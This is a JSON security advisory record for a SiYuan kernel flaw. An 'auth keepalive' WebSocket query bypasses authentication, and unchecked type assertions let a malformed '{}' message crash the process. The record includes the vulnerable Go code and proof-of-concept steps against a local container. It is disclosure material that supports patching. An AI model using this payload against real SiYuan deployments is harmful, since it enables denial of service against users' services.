{"schema_version":"1.7.5","id":"GHSA-3g9h-9hp4-654v","published":"2026-03-18T20:11:00Z","modified":"2026-03-25T19:46:57.858750Z","aliases":["CVE-2026-33203","GO-2026-4752"],"summary":"SiYuan has an Unauthenticated WebSocket DoS via Auth Keepalive Bypass","details":"## Summary\nThe SiYuan kernel WebSocket server accepts unauthenticated connections when a specific “auth keepalive” query parameter is present. After connection, incoming messages are parsed using unchecked type assertions on attacker-controlled JSON.\n\nA remote attacker can send malformed messages that trigger a runtime panic, potentially crashing the kernel process and causing denial of service.\n\n## Details\n**1. Authentication Bypass via Keepalive Query**\n\nUnauthenticated connections are accepted if the request URI matches a specific pattern intended for an authentication page keepalive.\n\n**File: kernel/server/serve.go**\n\n```\nif !authOk {\n    authOk = strings.Contains(s.Request.RequestURI, \"/ws?app=siyuan\") &&\n             strings.Contains(s.Request.RequestURI, \"&id=auth&type=auth\")\n}\n\n```\n\n**2. Unsafe Type Assertions on Untrusted Input**\n\nIncoming JSON messages are parsed into a generic map and fields are accessed without validation.\n\n**File: kernel/server/serve.go**\n\n```\ncmdStr := request[\"cmd\"].(string)\ncmdId  := request[\"reqId\"].(float64)\nparam  := request[\"param\"].(map[string]interface{})\n\n```\nMalformed or missing fields trigger a runtime panic.\nThe handler does not implement local panic recovery, allowing crashes to propagate.\n\n## PoC\n**Step 1 — Prepare workspace directory**\n\n```sh\nmkdir -p ./workspace\n```\n\n**Step 2 — Run SiYuan container**\n\n```\ndocker run -d \\\n  -p 6806:6806 \\\n  -e SIYUAN_ACCESS_AUTH_CODE_BYPASS=true \\\n  -v $(pwd)/workspace:/siyuan/workspace \\\n  b3log/siyuan \\\n  --workspace=/siyuan/workspace\n```\n\nService becomes reachable at http://127.0.0.1:6806\n\n**Step 3 — Confirm service availability**\n\nOpen in browser:\n\n```sh\nhttp://127.0.0.1:6806\n```\n\n**Step 4 — Connect to unauthenticated WebSocket endpoint**\n\n```sh\nws://127.0.0.1:6806/ws?app=siyuan&id=auth&type=auth\n```\n\nThis connection is accepted without credentials.\n\n**Step 5 — Send malformed payload**\n\nPayload:\n\n```sh\n\n{}\n\n```\n\n**Step 6 — Observe behavior**\n\nMonitor container logs:\n\n```sh\n\ndocker logs -f <container_id>\n\n```\n## Impact\nAn unauthenticated attacker with network access can repeatedly crash the kernel, causing persistent denial of service.\n\nImpact is highest when the service is exposed beyond localhost (e.g., Docker deployments, reverse proxies, LAN access, or public hosting).","affected":[{"package":{"name":"github.com/siyuan-note/siyuan/kernel","ecosystem":"Go","purl":"pkg:golang/github.com/siyuan-note/siyuan/kernel"},"ranges":[{"type":"SEMVER","events":[{"introduced":"0"},{"fixed":"3.6.2"}]}],"database_specific":{"last_known_affected_version_range":"<= 3.6.1","source":"https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2026/03/GHSA-3g9h-9hp4-654v/GHSA-3g9h-9hp4-654v.json"}}],"references":[{"type":"WEB","url":"https://github.com/siyuan-note/siyuan/security/advisories/GHSA-3g9h-9hp4-654v"},{"type":"ADVISORY","url":"https://nvd.nist.gov/vuln/detail/CVE-2026-33203"},{"type":"PACKAGE","url":"https://github.com/siyuan-note/siyuan"}],"database_specific":{"cwe_ids":["CWE-248","CWE-306"],"github_reviewed":true,"github_reviewed_at":"2026-03-18T20:11:00Z","nvd_published_at":"2026-03-20T23:16:45Z","severity":"HIGH"},"severity":[{"type":"CVSS_V3","score":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"}]}